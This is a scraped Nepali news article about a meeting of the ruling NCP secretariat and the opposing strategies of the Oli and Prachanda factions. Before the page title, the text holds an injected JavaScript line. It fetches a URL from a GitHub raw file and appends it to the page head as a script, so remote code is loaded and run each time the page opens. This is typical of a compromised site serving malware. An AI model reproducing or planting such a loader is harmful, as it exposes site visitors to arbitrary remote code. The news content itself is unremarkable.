;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); नेकपा सचिवालय बैठक आज, दुबै पक्षकाे आ-आफ्नै रणनीति – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • नेकपा सचिवालय बैठक आज, दुबै पक्षकाे आ-आफ्नै रणनीति
देश/प्रदेश

नेकपा सचिवालय बैठक आज, दुबै पक्षकाे आ-आफ्नै रणनीति

मंसिर १६,

काठमाडौं । सत्तारुढ नेकपाको सचिालय बैठक आज बस्दै छ। आज पार्टी कार्यालय धुम्बाराहीमा दिउँसो बस्न बस्न लागेको सचिवालय बैठकमा ओली र प्रचण्डको प्रतिवेदनसहित दुवैतर्फबाट गरिएका पत्राचारको कार्यसूचीमाथि छलफल अघि बढ्ने भएपछि दुवै समूहले आन्तरिक छलफलबाट बटमलाइन बनाएका छन्।

बैठक अघि गुटगत रणनीति बनाउन व्यस्त छन् । नेकपाका कार्यकारी अध्यक्ष पुष्पकमल दाहाल प्रचण्ड पक्ष र वरिष्ठ नेता माधवकुमार नेपाल पक्ष सचिवालय बैठकमा पेस भएका सबै पत्र र प्रस्ताव स्थायी कमिटीमा लैजाने प्रयासमा छ।

प्रधानमन्त्री एवं अध्यक्ष केपी ओली पक्षले भने प्रचण्डको प्रस्ताव फिर्ता वा संशोधन गराएर सचिवालयबाटै साझा प्रस्ताव बनाउन जोड दिने रणनीतिमा छ।

शनिबार बसेको सचिवालय बैठकमा प्रधानमन्त्री एवं अध्यक्ष ओलीले ३८ पृष्ठको जवाफी प्रतिवेदन पेश गरेपछि नेकपामा दुई वटा प्रस्तावले औपचारिक रुपमा प्रवेश पाएका छन्।

बैठक माग गर्दै पाँचजना सचिवालय सदस्यले कात्तिक २५ गते ओलीलाई पत्र लेखेपछि नेकपाभित्र पत्रयुद्ध पनि चलेको छ। कात्तिक २८ मा प्रचण्डले सचिवालय बैठकमा ओलीलाई जवाफी पत्रसहित १९ पृष्ठको प्रस्ताव पेस गरेका थिए। त्यसको जवाफमा ओलीले अर्को प्रस्ताव पेश गरेका हुन्।

फेसबुक प्रतिक्रियाहरु